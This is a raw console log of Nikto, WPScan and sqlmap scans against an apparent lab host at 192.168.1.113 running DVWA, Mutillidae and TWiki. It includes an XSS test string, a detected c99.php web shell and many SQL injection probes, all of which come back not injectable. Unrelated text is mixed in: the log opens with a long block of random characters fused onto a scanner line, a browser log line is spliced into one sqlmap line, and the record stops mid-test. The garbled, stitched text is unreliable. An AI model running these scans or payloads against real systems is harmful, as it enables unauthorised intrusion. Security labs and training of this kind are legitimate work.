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<script>alert(foo)</script>: Output from the phpinfo() function was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpMyAdmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /c99.php: c99.php remote web shell
+ 8347 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time: 2015-09-06 17:29:24 (GMT-4) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.8
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[!] [!] The remote website is up, but does not seem to be running WordPress.
python: can't open file 'CMSmap/cmsmap.py': [Errno 2] No such file or directory
_
___ ___| |_____ ___ ___ {1.0-dev-7acddbf}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 17:29:26
do you want to check for the existence of site's sitemap(.xml) [y/N] n
[17:29:26] [INFO] starting crawler
[17:29:26] [INFO] searching for links with depth 1
[17:29:26] [INFO] heuristics detected web page charset 'ascii'
[17:29:26] [INFO] searching for links with depth 2
please enter number of threads? [Enter for 1 (current)] 1
[17:29:26] [WARNING] running in a single-thread mode. This could take a while
[17:29:26] [INFO] 2/5 links visited (40%)
sqlmap got a 302 redirect to 'http://192.168.1.113:80/dvwa/login.php'. Do you want to follow? [Y/n] Y
[17:29:27] [INFO] searching for links with depth 3
please enter number of threads? [Enter for 1 (current)] 1
[17:29:27] [WARNING] running in a single-thread mode. This could take a while
[17:29:27] [INFO] 1/58 links visited (2%)
[17:29:31] [INFO] heuristics detected web page charset 'ISO-8859-2'
[17:29:41] [INFO] searching for links with depth 4
please enter number of threads? [Enter for 1 (current)] 1
[17:29:41] [WARNING] running in a single-thread mode. This could take a while
[17:31:46] [INFO] 33/487 links visited (7%)1441575106952 addons.update-checker WARN Update manifest for {972ce4c6-7e08-4474-a285-3208198ce6fd} did not contain an updates property
[17:40:13] [INFO] 155/487 links visited (32%)
[17:59:53] [INFO] searching for links with depth 5
please enter number of threads? [Enter for 1 (current)] 1
[17:59:53] [WARNING] running in a single-thread mode. This could take a while
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N] N
[18:17:29] [INFO] sqlmap got a total of 4735 targets
URL 1:
GET http://192.168.1.113:80/dav/?C=N;O=D
do you want to test this URL? [Y/n/q]
> Y
[18:17:29] [INFO] testing URL 'http://192.168.1.113:80/dav/?C=N;O=D'
[18:17:29] [INFO] using '/root/.sqlmap/output/results-09062015_0617pm.csv' as the CSV results file in multiple targets mode
[18:17:29] [INFO] testing connection to the target URL
[18:17:29] [INFO] testing if the target URL is stable
[18:17:30] [INFO] target URL is stable
[18:17:30] [INFO] testing if GET parameter 'C' is dynamic
[18:17:30] [WARNING] GET parameter 'C' does not appear dynamic
[18:17:30] [WARNING] heuristic (basic) test shows that GET parameter 'C' might not be injectable
[18:17:30] [INFO] testing for SQL injection on GET parameter 'C'
[18:17:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:17:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:17:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:17:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:17:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:17:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:17:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:17:31] [INFO] testing 'MySQL inline queries'
[18:17:31] [INFO] testing 'PostgreSQL inline queries'
[18:17:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:17:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:17:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:17:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:17:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:17:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:17:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:17:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:17:31] [INFO] testing 'Oracle AND time-based blind'
[18:17:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:17:31] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:17:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:17:32] [WARNING] GET parameter 'C' is not injectable
[18:17:32] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:17:32] [INFO] skipping 'http://192.168.1.113:80/dav/?C=M;O=A'
[18:17:32] [INFO] skipping 'http://192.168.1.113:80/dav/?C=S;O=A'
[18:17:32] [INFO] skipping 'http://192.168.1.113:80/dav/?C=D;O=A'
URL 2:
GET http://192.168.1.113:80/mutillidae/index.php?page=home.php
do you want to test this URL? [Y/n/q]
> Y
[18:17:32] [INFO] testing URL 'http://192.168.1.113:80/mutillidae/index.php?page=home.php'
[18:17:32] [INFO] testing connection to the target URL
[18:17:32] [INFO] testing if the target URL is stable
[18:17:33] [INFO] target URL is stable
[18:17:33] [INFO] testing if GET parameter 'page' is dynamic
[18:17:33] [INFO] confirming that GET parameter 'page' is dynamic
[18:17:33] [INFO] GET parameter 'page' is dynamic
[18:17:33] [WARNING] heuristic (basic) test shows that GET parameter 'page' might not be injectable
[18:17:33] [INFO] heuristic (XSS) test shows that GET parameter 'page' might be vulnerable to XSS attacks
[18:17:33] [INFO] testing for SQL injection on GET parameter 'page'
[18:17:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:17:34] [WARNING] reflective value(s) found and filtering out
[18:17:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:17:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:17:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:17:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:17:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:17:37] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:17:37] [INFO] testing 'MySQL inline queries'
[18:17:37] [INFO] testing 'PostgreSQL inline queries'
[18:17:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:17:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:17:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:17:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:17:39] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:17:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:17:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:17:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:17:41] [INFO] testing 'Oracle AND time-based blind'
[18:17:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:17:41] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:17:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:17:54] [WARNING] GET parameter 'page' is not injectable
[18:17:54] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:17:54] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=login.php'
URL 3:
GET http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=home.php
do you want to test this URL? [Y/n/q]
> Y
[18:17:54] [INFO] testing URL 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=home.php'
[18:17:54] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://192.168.1.113:80/mutillidae/index.php'. Do you want to follow? [Y/n] Y
[18:17:55] [INFO] testing if the target URL is stable
[18:17:56] [WARNING] GET parameter 'do' does not appear dynamic
[18:17:56] [WARNING] heuristic (basic) test shows that GET parameter 'do' might not be injectable
[18:17:56] [INFO] testing for SQL injection on GET parameter 'do'
[18:17:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:17:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:17:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:17:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:17:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:17:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:17:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:17:59] [INFO] testing 'MySQL inline queries'
[18:17:59] [INFO] testing 'PostgreSQL inline queries'
[18:17:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:18:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:18:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:18:00] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:18:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:18:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:18:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:18:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:18:03] [INFO] testing 'Oracle AND time-based blind'
[18:18:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:18:03] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:18:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:18:16] [WARNING] GET parameter 'do' is not injectable
[18:18:16] [INFO] skipping previously processed GET parameter 'page'
[18:18:16] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:18:16] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=home.php'
[18:18:16] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=show-log.php'
[18:18:16] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=captured-data.php'
[18:18:16] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=credits.php'
[18:18:16] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=user-info.php'
[18:18:16] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=register.php'
[18:18:16] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=view-someones-blog.php'
URL 4:
GET http://192.168.1.113:80/mutillidae/?page=add-to-your-blog.php
do you want to test this URL? [Y/n/q]
> Y
[18:18:16] [INFO] testing URL 'http://192.168.1.113:80/mutillidae/?page=add-to-your-blog.php'
[18:18:16] [INFO] testing connection to the target URL
[18:18:16] [INFO] testing if the target URL is stable
[18:18:17] [INFO] target URL is stable
[18:18:17] [INFO] testing if GET parameter 'page' is dynamic
[18:18:17] [INFO] confirming that GET parameter 'page' is dynamic
[18:18:17] [INFO] GET parameter 'page' is dynamic
[18:18:17] [WARNING] heuristic (basic) test shows that GET parameter 'page' might not be injectable
[18:18:17] [INFO] heuristic (XSS) test shows that GET parameter 'page' might be vulnerable to XSS attacks
[18:18:17] [INFO] testing for SQL injection on GET parameter 'page'
[18:18:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:18:18] [WARNING] reflective value(s) found and filtering out
[18:18:19] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:18:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:18:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:18:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:18:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:18:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:18:21] [INFO] testing 'MySQL inline queries'
[18:18:21] [INFO] testing 'PostgreSQL inline queries'
[18:18:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:18:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:18:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:18:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:18:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:18:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:18:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:18:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:18:25] [INFO] testing 'Oracle AND time-based blind'
[18:18:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:18:25] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:18:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:18:38] [WARNING] GET parameter 'page' is not injectable
[18:18:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:18:38] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=site-footer-xss-discussion.php'
[18:18:38] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=html5-storage.php'
[18:18:38] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=capture-data.php'
[18:18:38] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=dns-lookup.php'
URL 5:
GET http://192.168.1.113:80/mutillidae/index.php?page=password-generator.php&username=anonymous
do you want to test this URL? [Y/n/q]
> Y
[18:18:38] [INFO] testing URL 'http://192.168.1.113:80/mutillidae/index.php?page=password-generator.php&username=anonymous'
[18:18:38] [INFO] testing connection to the target URL
[18:18:38] [INFO] testing if the target URL is stable
[18:18:39] [INFO] target URL is stable
[18:18:39] [INFO] skipping previously processed GET parameter 'page'
[18:18:39] [INFO] testing if GET parameter 'username' is dynamic
[18:18:39] [WARNING] GET parameter 'username' does not appear dynamic
[18:18:39] [WARNING] heuristic (basic) test shows that GET parameter 'username' might not be injectable
[18:18:39] [INFO] heuristic (XSS) test shows that GET parameter 'username' might be vulnerable to XSS attacks
[18:18:39] [INFO] testing for SQL injection on GET parameter 'username'
[18:18:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:18:40] [WARNING] reflective value(s) found and filtering out
[18:18:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:18:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:18:42] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:18:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:18:43] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:18:43] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:18:43] [INFO] testing 'MySQL inline queries'
[18:18:44] [INFO] testing 'PostgreSQL inline queries'
[18:18:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:18:44] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:18:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:18:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:18:45] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:18:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:18:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:18:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:18:47] [INFO] testing 'Oracle AND time-based blind'
[18:18:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:18:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:18:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:19:00] [WARNING] GET parameter 'username' is not injectable
[18:19:00] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=user-poll.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=set-background-color.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=pen-test-tool-lookup.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=text-file-viewer.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=view-someones-blog.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=show-log.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=text-file-viewer.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=user-info.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=browser-info.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=login.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=source-viewer.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=arbitrary-file-inclusion.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=add-to-your-blog.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=secret-administrative-pages.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=credits.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=source-viewer.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=framing.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=change-log.htm'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=installation.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=documentation/vulnerabilities.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=documentation/how-to-access-Mutillidae-over-Virtual-Box-network.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=usage-instructions.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=php-errors.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=notes.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=arbitrary-file-inclusion.php'
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=arbitrary-file-inclusion.php'
URL 6:
GET http://192.168.1.113:80/../rdiff/TWiki/TWikiHistory?rev1=1.10&rev2=1.9
do you want to test this URL? [Y/n/q]
> Y
[18:19:00] [INFO] testing URL 'http://192.168.1.113:80/../rdiff/TWiki/TWikiHistory?rev1=1.10&rev2=1.9'
[18:19:00] [INFO] testing connection to the target URL
[18:19:00] [WARNING] the web server responded with an HTTP error code (400) which could interfere with the results of the tests
[18:19:00] [INFO] testing if the target URL is stable
[18:19:01] [INFO] target URL is stable
[18:19:01] [INFO] testing if GET parameter 'rev1' is dynamic
[18:19:01] [WARNING] GET parameter 'rev1' does not appear dynamic
[18:19:01] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[18:19:01] [INFO] testing for SQL injection on GET parameter 'rev1'
[18:19:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:19:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:19:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:19:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:19:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:19:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:19:02] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:19:02] [INFO] testing 'MySQL inline queries'
[18:19:02] [INFO] testing 'PostgreSQL inline queries'
[18:19:02] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:19:02] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:19:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:19:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:19:02] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:19:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:19:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:19:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:19:02] [INFO] testing 'Oracle AND time-based blind'
[18:19:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:19:02] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:19:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:19:03] [WARNING] GET parameter 'rev1' is not injectable
[18:19:03] [INFO] testing if GET parameter 'rev2' is dynamic
[18:19:03] [WARNING] GET parameter 'rev2' does not appear dynamic
[18:19:03] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[18:19:03] [INFO] testing for SQL injection on GET parameter 'rev2'
[18:19:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:19:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
